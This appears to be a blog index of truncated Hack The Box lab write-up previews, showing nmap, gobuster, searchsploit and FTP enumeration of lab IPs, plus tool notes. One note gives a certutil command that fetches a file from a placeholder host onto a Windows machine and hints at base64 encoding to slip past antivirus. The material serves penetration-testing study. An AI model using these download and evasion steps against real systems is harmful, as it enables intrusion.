HTB Curling

$ nmap -T4 -A -p- 10.10.10.150
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.10.150 -e
If we access http://10.10.10.150/administrator/, we’ll find a Joomla login form. Accessing http://10.10.10.150, based on the published post there are these users: Super User, Floris. Looking at the source code, there is a suspicious secret.txt file somewhere: http://10.10.10.150/secret.txt. This string seems to be encoded. Searching for «linux decode string», Google gives us the suggestion of

HTB Postman

$ nmap -A -p- -T4 10.10.10.160
Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
$ gobuster dir -u http://10.10.10.160 -w
Access http://10.10.10.160
Access http://10.10.10.160:10000
Access https://10.10.10.160:1000
Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and

HTB Writeup

$ nmap -A -T4 -p- -sV 10.10.10.138
Although nmap says port 80 is open, it also appears as tcpwrapped. What does it mean? Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux. When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper. Specifically, it means that a full TCP handshake was completed,

HTB Irked

$ nmap -A -T4 -p- 10.10.10.117
Access http://10.10.10.117
According to Nmap’s results, we have these open ports related to UnrealIRCd:
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)
As we have an IRC server in this box, let’s start by trying to connect to it.
$ sudo irssi 10.10.10.117 65534
According to this, we have UnrealIRCd version 3.2.8.1.
$ searchsploit unrealirc
Exploiting UnrealIRC

HTB OpenAdmin

Enumeration
$ nmap -A -T4 -p- 10.10.10.171
$ gobuster dir -u 10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e
Access http://10.10.10.171
Access http://10.10.10.171/music
There is a login link. Click it and you’ll be redirected to http://10.10.10.171/ona. Based on this screenshot, we have an OpenNetAdmin (v18.1.1).
Access http://10.10.10.171/sierra
Access http://10.10.10.171/artwork
Vulnerability analysis
$ searchsploit opennetadmin
$ searchsploit -x 47691
The -d option in curl means data. -d, --data: (HTTP MQTT) Sends the specified data in a POST

HTB Friendzone

$ sudo nmap -A -T4 -p- 10.10.10.123
$ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u http://10.10.10.123/
Access http://10.10.10.123
Access https://10.10.10.123/
We discovered that the SSL cert is using friendzone.red as its common name (it is a vhost), so we can access https://friendzone.red/ (after this host was added to the /etc/hosts file). We can do a zone transfer for that domain I saw earlier on the main page and get the

HTB Access

$ nmap -A -T4 -p- 10.10.10.98
Open ports detected:
• 21/tcp open ftp Microsoft ftpd
• 23/tcp open telnet?
• 80/tcp open http Microsoft IIS httpd 7.5
$ ftp 10.10.10.98
ftp> dir
ftp> cd Backups
ftp> dir
ftp> get backup.mdb
ftp> cd ..
ftp> dir
ftp> cd Engineer
ftp> dir
ftp> get "Access Control.zip"
The files haven’t been downloaded correctly. By default, the ftp transfer mode is set for text files. We need to download these files again, but this time using

Impacket installation

Impacket is a collection of Python classes for working with network protocols. https://github.com/SecureAuthCorp/impacket
Installation process:
Download the latest release.
Extract the file.
Install the requirements.
Install the package.
$ pip install -r requirements.txt
If we get an error installing the wheel package, we can install it individually.
$ pip install wheel
Now run the configuration script.
$ python setup.py bdist_wheel
Let’s try to install the requirements again:
$ pip install -r requirements.txt

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command will download «file» to the Windows machine from «http://<ip>»:
certutil.exe -urlcache -split -f http://<ip>/file file
Depending on the file, it could be detected as malicious and then be blocked. A possible solution may be using the method described in this post from https://www.bleepingcomputer.com. The trick is based on base64-encoding the file when sending the

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. https://github.com/Tib3rius/AutoRecon
Run the installation script:
$ python3 -m pip install git+https://github.com/Tib3rius/AutoRecon.git
Add /home/ruben/.local/bin to your PATH.
Other requirements installation:
$ sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner